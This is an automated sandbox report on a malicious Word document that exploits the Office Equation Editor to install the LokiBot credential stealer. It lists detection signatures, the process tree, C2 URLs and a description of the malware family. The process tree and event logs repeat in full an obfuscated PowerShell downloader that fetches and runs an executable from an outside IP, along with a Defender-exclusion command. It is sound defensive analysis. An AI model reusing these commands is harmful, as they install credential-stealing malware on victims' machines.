Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
stthigns.doc

Overview

General Information

Sample name:stthigns.doc
renamed because original name is a hash value
Original sample name:seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc
Analysis ID:1559262
MD5:e6859034a42f217800b6bf0980e93848
SHA1:8dcb69dcf727b7a7fbfbf6755492990dc51fd192
SHA256:564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1
Tags:docuser-abuse_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Lokibot
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Drops PE files with benign system names
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
PowerShell case anomaly found
Powershell drops PE file
Shellcode detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Equation Editor Network Connection
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches the installation path of Mozilla Firefox
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3192 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3276 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • mshta.exe (PID: 3428 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
        • powershell.exe (PID: 3488 cmdline: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • csc.exe (PID: 3756 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.cmdline" MD5: F8F36858B9405FBE27377FD7E8FEC2F2)
            • cvtres.exe (PID: 3764 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4441.tmp" "c:\Users\user\AppData\Local\Temp\4vzopkvk\CSC2CE1E80E8DFB46C4BC398124C902BE0.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
          • wininit.exe (PID: 3868 cmdline: "C:\Users\user\AppData\Roaming\wininit.exe" MD5: 66B03D1AFF27D81E62B53FC108806211)
            • powershell.exe (PID: 3924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • wininit.exe (PID: 3932 cmdline: "C:\Users\user\AppData\Roaming\wininit.exe" MD5: 66B03D1AFF27D81E62B53FC108806211)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/maxzi/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
stthigns.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x154b:$obj1: \objhtml
  • 0x1588:$obj2: \objdata
  • 0x1570:$obj3: \objupdate
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\~WRD0000.tmpINDICATOR_RTF_EXPLOIT_CVE_2017_8759_2detects CVE-2017-8759 weaponized RTF documents.ditekSHen
    • 0xa175:$clsid3: 4d73786d6c322e534158584d4c5265616465722e
    • 0xa1bf:$ole2: d0cf11e0a1b11ae1
    • 0x5c8f:$obj2: \objdata
    • 0x5c6d:$obj4: \objemb
    SourceRuleDescriptionAuthorStrings
    0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x1f170:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0xc523:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 29 entries
          SourceRuleDescriptionAuthorStrings
          13.2.wininit.exe.3a0edc0.4.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
            13.2.wininit.exe.3a0edc0.4.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              13.2.wininit.exe.3a0edc0.4.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                13.2.wininit.exe.3a0edc0.4.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                13.2.wininit.exe.3a0edc0.4.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                Click to see the 37 entries

                Exploits

                barindex
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 66.63.187.231, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3276, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3276, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\goodtoseeuthatgreatthingswithentirethingsgreatfor[1].hta

                System Summary

                barindex
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3276, Protocol: tcp, SourceIp: 66.63.187.231, SourceIsIpv6: false, SourcePort: 80
                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3488, TargetFilename: C:\Users\user\AppData\Roaming\wininit.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ParentImage: C:\Users\user\AppData\Roaming\wininit.exe, ParentProcessId: 3868, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 3924, ProcessName: powershell.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", CommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgI
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" , CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3276, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" , ProcessId: 3428, ProcessName: mshta.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt, ProcessId: 3616, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wininit.exe, NewProcessName: C:\Users\user\AppData\Roaming\wininit.exe, OriginalFileName: C:\Users\user\AppData\Roaming\wininit.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 3868, ProcessName: wininit.exe
